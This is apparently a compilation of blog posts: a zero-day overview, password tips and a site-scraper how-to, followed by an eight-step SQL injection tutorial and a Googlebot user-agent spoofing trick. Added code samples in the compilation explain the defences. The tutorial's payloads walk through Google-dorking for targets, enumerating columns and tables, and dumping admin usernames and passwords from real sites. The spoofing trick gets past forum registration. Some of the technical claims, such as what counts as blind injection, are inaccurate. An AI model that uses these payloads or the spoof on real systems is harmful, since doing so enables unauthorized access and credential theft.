
Zero-Day Attacks - How Safe Are You?

This is a guest post by Meenakshi Nagri.
In the past couple of years, there has been a rise in cyber-attacks, which has pushed demand for more reliable security capabilities such as protection, code security, encryption and authorization. Moreover, it is imperative to protect global business and critical infrastructure from such cyber-attacks.

An average user, or even a web-savvy user, has little knowledge of which applications have better security standards. It is imperative to evaluate the safety of applications. There are some security protocols which should be maintained without deviating from the end goal.
Both organisations and individuals should strive to follow all the necessary security protocols and, most importantly, evaluate and meet all the security requirements so that they can be assured they meet the baseline for data security.

Vulnerability Timeline

A study reveals that about 20% of global organisations rank cyber espionage as their most pressing concern, making it a significant threat to their business. The number of zero-days is continually rising, with each attack more severe than the last. The primary targets have been government institutions, organisations from various sectors, individuals and so on.

The basic aim of cyber espionage is to expose the private information of the person or company concerned. Cyber espionage tops the list of security concerns because its repercussions can be felt even after the threat has been eliminated, as it damages trade and creates a dent in the global economy.
Ransomware, malware attacks, phishing, etc. are some common cyber-attacks. A recent case in point is the WannaCry ransomware attack. It was reported that it had infected more than 230,000 computers worldwide. Many organisations were hit in over 150 countries. The common tactic is to take advantage of the gaps left in the networks shared by business partners and government agencies. Simply put, these entities share valuable information through these networks, and hackers who penetrate them can easily get access to that information.

The question that arises next is why these entities are affected by cyber-attacks. The reason is the lack of proper implementation of security protocols. Organizations, enterprises and individuals need to be informed of cyber-attack activities so that they can better recognize the risk of exposure before they are actually exposed.

Threats are Constantly Evolving

While recently catching up with news, you may have heard terms like ‘zero day’ and ‘cyber conflict’ over and over again. The technology has bestowed us with new exciting security protocols. This implies that with each advancement, we are better at adding an extra layer of security; however, as these approaches become obsolete, they can be bypassed quickly thus leaving a void for the cyber-attacks.

A zero-day vulnerability refers to such voids left in software which are unknown to the developers. The flaw is then exploited by attackers with malicious intent before the developers even become aware of it. To counter the vulnerabilities, a software patch is released to fix the issue. One such example is Microsoft’s Patch Tuesday, i.e. Microsoft releases security patches on every second or fourth Tuesday of each month for its products.
One of the reasons for cyber espionage is the failure to apply these tactics, i.e. to update systems with recent security updates. Systems running unsupported operating systems or older versions were substantially exposed.

Simply put, developers create software that contains some voids, and attackers spot the vulnerability and exploit it before developers can act. Once the patches are released, the exploits are no longer a threat.

The Role of Security Standard

As attackers look for advanced ways to exploit vulnerabilities, they adopt new procedures and techniques. They use hacking methods such as watering hole attacks, spear phishing, whaling and port scanning, to name a few.

Cyber security is a bigger challenge, as one needs to implement advanced protocols and meet safety standards when required. Even though organizations may fulfill all the criteria, or developers may check off everything on the security standards, there’s always room for enhancing the basic security capabilities. The fast-evolving tactics and unpredictable threats used by cyber criminals have pushed for advanced evaluation and monitoring of services.

As attackers adopt the latest technology, the security community is pushing for other defensive stances as well. It has started putting steps in place to guard against cyber-attacks. Struggling to keep up with security standards means putting critical information and infrastructure at risk.

Adopting techniques to protect the cyber environment is the need of the hour. The primary objective is to mitigate and prevent any potential for cyber-attacks and for that, more and more companies are implementing various security safeguards, risk management approaches, guidelines, policies, technologies, investing in data recovery services, so on and so forth.

A Helping Hand

Zero-days, cyber conflict and cyber espionage are all part of the broader picture of cyber-attacks, and together make up most of the cyber security challenge. Users need not be security experts to protect themselves against the attacks.
  1. Use a top antivirus that will ensure that you are protected against both known & unknown vulnerabilities.
  2. Time and again, IT experts ask users to update their software; an update may include protection from a recently discovered bug.
  3. Upgrade your browsers, and push out automatic browser updates regularly.
Stellar Data Recovery is one such name which is capable of countering such cyber-attacks; thereby, it presents itself as a reliable partner when it comes to data security.

The Final Word

We will always be wooed by the latest technological advancements, which also means that the old ones will become obsolete; adopting new security approaches is therefore equally essential. Cyber-attacks expose valuable assets by gaining unauthorized access; businesses therefore need to defend themselves against them and incorporate security protocols to mitigate the risk.

Simple Yet Effective Security Tips Against Website Hackers

This is a guest post by Chris Miller.

The internet is a very vast place with all kinds of people surfing it. With growing awareness of the internet and web-based services, it is now the responsibility of website owners to protect their websites against any risk or security threat from anyone else. Further, customer information, such as credit card details and other sensitive personal information, should be properly protected.

Hack attempts are a very common phenomenon now, and it has been noticed that around 90% of hackers rely on the simplest technique for it, i.e. human negligence. However, it is the responsibility of every software development company offering software development services to create secure websites and educate website owners about the various strategies and methods that would help them secure their websites from hack attempts. We are going to offer some very simple yet effective security tips that will help website owners protect their websites against hackers without applying any advanced security measures.

Create Strong Passwords: While this may sound absurd, it is one of the areas most targeted by hackers. They rely on the fact that most users are not really aware of the concept of strong passwords. A weak password is usually the weakest link in the chain, and hackers try to exploit it. The first thing that you need to do is create a very strong password.

Some of the passwords and password making techniques that should never be used are:
  • Never use the name of your website or the domain name as the admin password.
  • Predictable, simple combinations such as admin123, abc123, QWERTY, etc. should be strictly avoided, as hackers are definitely going to try them first.
  • The username and the password should never be similar or differ only by slight variations. This may sound foolish, but many users keep their username and password the same or very similar. For example, admin/admin123, George/george11, etc.
  • Words such as password, secret, admin, go, start, begin, etc. are also at the top of hackers' lists.
  • Also, avoid using words from the dictionary, as there are programs that will try every word in the dictionary against a user name in order to find the password.
Your passwords should be at least six characters long, with a mixture of upper and lowercase letters combined with numbers and special characters. Further, make sure that you have a unique password for each login and that passwords are changed at least once a month.
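
The rules above, expressed as a check that a signup or password-change form could run. This is an added example, not code from the original post; the function name, the tiny DICTIONARY wordlist and the sample domain are assumptions, and the other lists are the post's own examples.

```python
import re

PREDICTABLE = {"admin123", "abc123", "qwerty"}                 # from the post
COMMON_WORDS = {"password", "secret", "admin", "go", "start", "begin"}
DICTIONARY = {"sunshine", "dragon", "monkey", "welcome"}      # constructed stand-in


def letters_only(text):
    """Lower-case and keep letters only, so 'george11' becomes 'george'."""
    return re.sub(r"[^a-z]", "", text.lower())


def password_problems(password, username, domain):
    """Return the rules from the post that `password` breaks.

    `domain` is assumed to be a bare domain such as 'example.com'.
    """
    problems = []
    core = letters_only(password)
    site = letters_only(domain.split(".")[0])
    user = letters_only(username)

    if site and site in core:
        problems.append("contains the site or domain name")
    if password.lower() in PREDICTABLE:
        problems.append("predictable combination")
    if user and user == core:
        problems.append("same as or a slight variation of the username")
    if core in COMMON_WORDS:
        problems.append("common password word")
    if core in DICTIONARY:
        problems.append("dictionary word")
    if len(password) < 6:
        problems.append("shorter than six characters")
    classes = (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]")
    if not all(re.search(c, password) for c in classes):
        problems.append("missing upper/lower case, digit or special character")
    return problems


if __name__ == "__main__":
    for pw, user in [("admin123", "admin"), ("george11", "George"),
                     ("Example2024!", "chris"), ("Tr7#kV!q2z", "chris")]:
        print(pw, "->", password_problems(pw, user, "example.com") or "ok")
```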

Do Not Save The Passwords: Avoid saving passwords when you log into your site. Browsers save the passwords, and hackers go after any file named saved passwords or similar. They usually send out a Trojan that scans the whole computer for such files and sends them to the desired location.

Rename Your Admin Folder: Renaming the “admin” folder is another simple yet effective technique to save your website from hackers. Once you change the name of the admin folder, hackers won’t even have a clue how to reach your admin panel. However, the new name of the folder should not contain dictionary words or the site name. Further, try to include numbers and special characters to make the name tougher to guess.

These are some of the simplest tricks to enhance the security of your website without requiring much technical help or expertise. However, website owners should also include third-party software and solutions to make the website secure.

About the author:

Chris Miller is a blogger cum developer @ Xicom Technologies. Xicom is a leading CMMI Level-3 web development company offering custom PHP development, offshore web development and web development outsourcing services.

View & Download Complete Structure Of Any Website Using BlackWidow

The BlackWidow software can download the complete structure of a site and can also scan a site without downloading it to your hard drive.

Download it from here.
  • Download BlackWidow, install it & then open it.
  • Click on the Browser menu, enter the address as abc.com & then press Enter. It will browse the URL you have entered.
  • Now go to Scanner and click Start Scan.
  • After processing, you will see the complete structure of the site; likewise, you can also check for link errors, external errors, etc.

Hack SQL Vulnerable Websites In 8 Steps (SQL Injection Tutorial)

Basics Of Hacking
You have already gone through basic SQL injection (which is also called Blind SQL Injection & is mostly used by noobs) for hacking sites, such as entering queries like 1' or '1' = '1 in the admin & password fields. Today I will explain how SQL-vulnerable sites are hacked. This tutorial is for educational purposes only; it shows how the SQL databases of vulnerable sites are attacked. Follow these steps:
  1. Find SQL vulnerable site, for e.g. 
    http://www.example.com/index.php?id=3 (Easy way is to google it using "inurl:")
  2. Check whether it's vulnerable or not, enter a ' after the 3 in the url, for e.g.
    http://www.example.com/index.php?id=3'

    Note: If the page gives an error, the site is vulnerable and you can continue. But if the page loads without an error, the website is not vulnerable.
  3. Now find the number of columns in the database using "order by", for e.g.
    http://www.example.com/index.php?id=3 order by 1--
    http://www.example.com/index.php?id=3 order by 2--
    http://www.example.com/index.php?id=3 order by 3--
    http://www.example.com/index.php?id=3 order by 4--
    http://www.example.com/index.php?id=3 order by 5--
    http://www.example.com/index.php?id=3 order by 6--

    Note: If you receive an error here, it means we have 5 columns. If the site gives an error on "order by 8", then we would have 7 columns.
  4. Now find the vulnerable columns in existing 5 columns, for e.g.
    http://www.example.com/index.php?id=3 union all select 1,2,3,4,5--

    Note: If it executes successfully, the page will show some numbers. For e.g. 2 and 5 means columns 2 and 5 are vulnerable.
  5. Find the database version, user & name with commands:
    http://www.example.com/index.php?id=3 union all select 1,user(),3,4,version()--
    http://www.example.com/index.php?id=3 union all select 1,version(),3,4,database()--

    Note: If the version is 5 and above, then carry on.
  6. Now list all the table names using command after the url:
    union all select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

    For e.g. http://www.example.com/index.php?id=3 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--

    Take a glance at some useful tables like admin, user etc. Suppose you get table name admin.
  7. Now list all the column names using:
    union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--

    For e.g.: http://www.example.com/index.php?id=3 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()--

    Find some useful columns from it like username, passwd etc.
  8. Final step, retrieving the username & password fields from table admin (as mentioned above), use the command:
    union all select 1,group_concat(username,0x3a,passwd),3,4,5 from admin--
    Where admin is the table name.

    For e.g.: http://www.example.com/index.php?id=3 union all select 1,group_concat(username,0x3a,passwd),3,4,5 from admin--
    That's all. Now you have admin username & password. Enjoy!!
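
Why the steps above work, and what closes the hole: the page builds its SQL by pasting the id parameter into the query text. This is an added example, not code from the original post. It uses Python with an in-memory SQLite database in place of the PHP/MySQL site the tutorial assumes, and the table, rows and function names are constructed for illustration.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the site's database (constructed sample data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, "
               "body TEXT, author TEXT, created TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?, ?, ?, ?)", [
        (3, "Hello", "First post", "alice", "2012-01-01"),
        (4, "Again", "Second post", "bob", "2012-01-02"),
    ])
    return db


def get_article_vulnerable(db, raw_id):
    """The flaw the tutorial relies on: the parameter becomes part of the SQL text."""
    sql = ("SELECT id, title, body, author, created "
           "FROM articles WHERE id = " + raw_id)
    return db.execute(sql).fetchall()


def get_article_hardened(db, raw_id):
    """Validate the parameter as an integer, then bind it as data, never as SQL."""
    try:
        article_id = int(raw_id)
    except ValueError:
        return []   # a real handler would answer 400 and log the request
    sql = ("SELECT id, title, body, author, created "
           "FROM articles WHERE id = ?")
    return db.execute(sql, (article_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Inputs taken from steps 2-4 of the tutorial above.
    for raw in ["3", "3'", "3 order by 6--", "3 union all select 1,2,3,4,5--"]:
        try:
            result = get_article_vulnerable(db, raw)
        except sqlite3.Error as exc:   # the visible error steps 2 and 3 look for
            result = "SQL error: %s" % exc
        print(repr(raw), "| vulnerable:", result,
              "| hardened:", get_article_hardened(db, raw))
```

With the hardened function, every probe from steps 2 to 8 is rejected before it reaches the database, and the error-based checks in steps 2 and 3 no longer produce any signal. Returning a generic error page instead of the database error message removes that signal even where a query still fails.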

Access Forum Based Websites Without Sign Up Process

Users visit forums to find information, but some forums require registration to view their contents. Here is a way to access that information without registering on the site. Follow these steps:
  • Download the User Agent Switcher add-on for Firefox from here and install it.
  • Now go to Tools> Default User Agent> User Agent Switcher> Options.
  • It will display the User Agent Switcher Options.
  • Select New User Agent and type “crawl-66-249-66-1.googlebot.com” without quotes in Description, and in User Agent type “Googlebot/2.1 (+http://www.googlebot.com/bot.html)” without quotes; leave the other fields blank and then click OK.
  • Now go to Tools> Default User Agent again and select crawl-66-249-66-1.googlebot.com
You are done; browse any forum-based website without registering. If you have a question about Google Bot, you can learn about it from here.

Note: I suggest enabling this add-on only when you have to access forums, because your browser will show incompatibility with your sites. Disable it when you have no need of it. Hope you will succeed on the first attempt.
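
From the forum owner's side, this works only when the site trusts the User-Agent header on its own. The following added example (not part of the original post) shows forward-confirmed reverse DNS, the check Google documents for verifying its crawler. The function names and the lookup tables are constructed assumptions so the code runs offline; by default the function uses real DNS.

```python
import socket

GOOGLE_SUFFIXES = (".googlebot.com", ".google.com")

# Constructed lookup tables standing in for DNS.
SAMPLE_PTR = {
    "66.249.66.1": "crawl-66-249-66-1.googlebot.com",   # crawler address
    "203.0.113.7": "host7.example.net",                 # visitor with spoofed UA
    "198.51.100.9": "crawl-66-249-66-1.googlebot.com",  # forged PTR record
}
SAMPLE_A = {"crawl-66-249-66-1.googlebot.com": ["66.249.66.1"]}


def sample_reverse(ip):
    """Offline replacement for a PTR lookup."""
    if ip not in SAMPLE_PTR:
        raise OSError("no PTR record")
    return SAMPLE_PTR[ip]


def sample_forward(host):
    """Offline replacement for an A-record lookup."""
    return SAMPLE_A.get(host, [])


def is_real_googlebot(ip, user_agent, reverse=None, forward=None):
    """Accept a Googlebot User-Agent only if the client IP passes
    forward-confirmed reverse DNS."""
    if "googlebot" not in user_agent.lower():
        return False                    # not claiming to be Googlebot
    reverse = reverse or (lambda addr: socket.gethostbyaddr(addr)[0])
    forward = forward or (lambda host: socket.gethostbyname_ex(host)[2])
    try:
        host = reverse(ip).rstrip(".").lower()
        if not host.endswith(GOOGLE_SUFFIXES):
            return False                # PTR name is not in a Google domain
        return ip in forward(host)      # the name must resolve back to the IP
    except OSError:
        return False                    # lookup failed: treat as spoofed


if __name__ == "__main__":
    ua = "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
    for ip in ["66.249.66.1", "203.0.113.7", "198.51.100.9", "192.0.2.50"]:
        print(ip, is_real_googlebot(ip, ua, sample_reverse, sample_forward))
```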